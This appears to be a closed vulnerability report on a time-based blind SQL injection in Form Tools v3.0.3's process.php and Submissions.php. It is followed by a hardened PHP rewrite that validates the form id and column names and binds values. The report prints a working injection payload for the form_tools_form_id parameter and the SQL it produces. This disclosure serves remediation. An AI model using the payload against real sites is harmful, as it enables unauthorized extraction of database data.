Closed
Description
While testing a website with the installed formtools framework (v3.0.3), a blind time-based SQL injection was found in process.php, which processes forms using Submissions.php.
The vulnerable code in Submissions.php currently looks like this:
```php
$db->query("
    INSERT INTO {PREFIX}form_$form_id ($col_names_str) --
    VALUES ($placeholders_str)
");
```
By posting the query
form_tools_form_id=5+(submission_date)+SELECT+(IF(@@USER LIKE '',SLEEP(10),SLEEP(0)));%00
the query executed on the database resulted in
INSERT INTO form_5 (submission_date) SELECT (IF(@@USER LIKE '', SLEEP(10), SLEEP(0))); --
which allowed the attacker to exfiltrate data. Despite looking strange, INSERT INTO ... SELECT is valid SQL syntax.
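A hardened way to build the same INSERT, added here as an illustrative example and not Form Tools' own code: the form id is accepted only as a run of decimal digits before it becomes part of the table name, column names are checked against the columns the form really defines, and values travel as bound parameters. The `ft_` prefix, the `$allowedCols` list and the sample values are assumptions.

```php
<?php
// Added example, not Form Tools code. Table names and column names cannot be
// bound as parameters, so they are validated; the values use PDO placeholders.

/**
 * Returns [$sql, $params] or throws if any identifier is not acceptable.
 * $formIdRaw  - untrusted value of form_tools_form_id from the request
 * $colNames   - column names taken from the request
 * $allowedCols - columns actually defined for this form (loaded from the schema)
 * $values     - submitted values, same order as $colNames
 */
function buildFormInsert(string $prefix, $formIdRaw, array $colNames,
                         array $allowedCols, array $values): array
{
    // "5 (submission_date) SELECT ..." fails here: only decimal digits pass.
    $formIdStr = is_int($formIdRaw) ? (string) $formIdRaw : (string) ($formIdRaw ?? '');
    if ($formIdStr === '' || !ctype_digit($formIdStr)) {
        throw new InvalidArgumentException('form id must be a positive integer');
    }
    $formId = (int) $formIdStr;

    if (count($colNames) === 0 || count($colNames) !== count($values)) {
        throw new InvalidArgumentException('column/value count mismatch');
    }
    foreach ($colNames as $col) {
        // Allowlist against the form's real schema rather than a regex alone.
        if (!in_array($col, $allowedCols, true)) {
            throw new InvalidArgumentException("unknown column: $col");
        }
    }

    $quotedCols   = array_map(fn($c) => "`$c`", $colNames); // already allowlisted
    $placeholders = implode(', ', array_fill(0, count($values), '?'));
    $sql = sprintf('INSERT INTO %sform_%d (%s) VALUES (%s)',
        $prefix, $formId, implode(', ', $quotedCols), $placeholders);
    return [$sql, array_values($values)];
}

// Demo with constructed data: the payload from the report is rejected before
// any SQL text is assembled.
$allowed = ['submission_date', 'ip_address', 'col_1']; // assumed schema
try {
    buildFormInsert('ft_', "5 (submission_date) SELECT (IF(@@USER LIKE '',SLEEP(10),SLEEP(0)));\0",
        ['submission_date'], $allowed, ['2024-01-01 00:00:00']);
} catch (InvalidArgumentException $e) {
    echo "rejected: {$e->getMessage()}\n";
}
[$sql, $params] = buildFormInsert('ft_', '5', ['submission_date', 'col_1'],
    $allowed, ['2024-01-01 00:00:00', 'hello']);
echo $sql, "\n"; // INSERT INTO ft_form_5 (`submission_date`, `col_1`) VALUES (?, ?)
```

Hand `$sql` and `$params` to a prepared statement (for example `$pdo->prepare($sql)->execute($params)`) so the submitted values never touch the query text.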